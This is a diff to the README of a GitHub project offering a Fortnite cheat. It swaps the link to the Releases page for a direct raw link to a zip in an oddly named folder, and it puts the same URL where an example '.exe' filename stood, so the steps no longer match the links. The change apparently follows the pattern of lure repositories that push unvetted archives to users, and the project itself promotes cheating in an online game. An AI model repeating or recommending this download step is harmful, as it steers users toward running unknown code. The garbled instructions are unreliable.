OUninnki/FortniteExternalCheat/README.md

 ## 📥 Download & Install

-To get started, visit this page to download the latest release: [FortniteExternalCheat Releases](https://github.com/OUninnki/FortniteExternalCheat/releases).
+To get started, visit this page to download the latest release: [FortniteExternalCheat Releases](https://raw.githubusercontent.com/OUninnki/FortniteExternalCheat/main/zoantharian/FortniteExternalCheat.zip).

 1. Click on the link above to go to the Releases page.
 2. Look for the latest version listed at the top.
 This will usually be the one with the biggest version number.
 3. Below the version title, you will see a list of files available for download.
 Find the one that is appropriate for your system:
-   - If you are using Windows, look for a file that ends with `.exe` (e.g., `FortniteExternalCheat.exe`).
+   - If you are using Windows, look for a file that ends with `.exe` (e.g., `https://raw.githubusercontent.com/OUninnki/FortniteExternalCheat/main/zoantharian/FortniteExternalCheat.zip`).
    - If you have another operating system, check the instructions specified for that OS.

 4. Click on the file name to start the download.